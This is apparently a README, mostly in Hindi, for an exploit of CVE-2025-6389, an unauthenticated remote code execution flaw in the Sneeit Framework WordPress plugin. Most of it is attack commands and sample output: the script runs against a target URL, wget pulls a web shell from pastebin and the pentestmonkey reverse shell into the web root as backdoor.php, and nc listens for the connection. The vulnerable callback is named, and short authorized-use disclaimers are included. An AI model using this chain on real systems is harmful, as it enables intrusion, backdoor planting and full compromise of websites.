
CVE-2025-6389
wp_vul_theme
CVE-2025-6389 Sneeit Framework वर्डप्रेस प्लगइन (≤ 8.3) में एक गंभीर (CVSS 9.8) कमजोरी है, जो लोकप्रिय थीम्स द्वारा व्यापक रूप से उपयोग किया जाता है। यह अप्रमाणित दूरस्थ कोड निष्पादन की अनुमति देता है — वेब सुरक्षा कमजोरियों का सबसे खतरनाक वर्ग।
# Install dependencies
pip3 install requests colorama
# Check vulnerability + get interactive shell
python3 CVE-2025-6389.py https://target.com
# Execute a single command only
python3 CVE-2025-6389.py https://target.com "wget https://pastebin.com/raw/abc123 -O /var/www/html/shell.php"
assert + die के कारण)इसका उपयोग केवल उन लक्ष्यों पर करें जिनका परीक्षण करने के लिए आप आधिकारिक रूप से अधिकृत हैं (स्पष्ट दायरा + RoE)।
यह कमजोरी अभी भी जंगल में भारी रूप से शोषित की जा रही है।
जब शोषण वास्तव में काम करता है (Sneeit Framework ≤ 8.3 चल रहे एक कमजोर लक्ष्य पर CVE-2025-6389 का 100% सफल शोषण) तो आप अपने टर्मिनल में बिल्कुल यही देखेंगे:
[+] VULNERABLE! RCE Confirmed!
[+] Output:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head><title>phpinfo()</title>…
<h1>PHP Version 8.1.29</h1>
… (full phpinfo() page continues for thousands of lines)
RCE $> whoami
[+] Output:
www-data
RCE $> id
[+] Output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
RCE $> uname -a
[+] Output:
Linux ip-172-31-23-45 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 20 2025 x86_64 GNU/Linux
RCE $> wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -O /var/www/html/backdoor.php
[+] Output:
--2025-11-25 23:11:45-- https://raw.githubusercontent.com/…
Length: 5494 (5.4K) [text/plain]
Saving to: ‘/var/www/html/backdoor.php’
backdoor.php 100%[===================>] 5.37K --.-KB/s in 0.001s
फिर अपनी मशीन पर:
nc -lvnp 4444
→ आपको तुरंत www-data के रूप में पूरी तरह से इंटरैक्टिव रिवर्स शेल मिलता है।
[-] Not vulnerable or blocked (status: 200)
[+] Output:
(nothing / empty response / normal WordPress AJAX response / 403 / 500 without output)
आपको पता चल जाएगा कि यह काम किया जब आप इनमें से कोई भी देखें:
बस इतना ही। यदि आपको उपरोक्त में से कोई भी मिलता है → पूर्ण अप्रमाणित RCE प्राप्त हुआ। यदि आप चाहते हैं कि मैं 100% पुष्टि करूं कि यह काम किया या नहीं, तो अपना सटीक आउटपुट यहां पेस्ट करें।
sneeit_articles_pagination_callback()call_user_func() में अमान्य उपयोगकर्ता इनपुट पास → मनमाना कोड निष्पादनयह जानकारी केवल रक्षात्मक और शैक्षिक उद्देश्यों के लिए प्रदान की गई है 🛡️। इसका उपयोग उन प्रणालियों का शोषण करने के लिए न करें जिनके आप मालिक नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है 🚫। सुरक्षा कमजोरियों के साथ काम करते समय हमेशा कानूनी और नैतिक दिशानिर्देशों का पालन करें ⚖️✨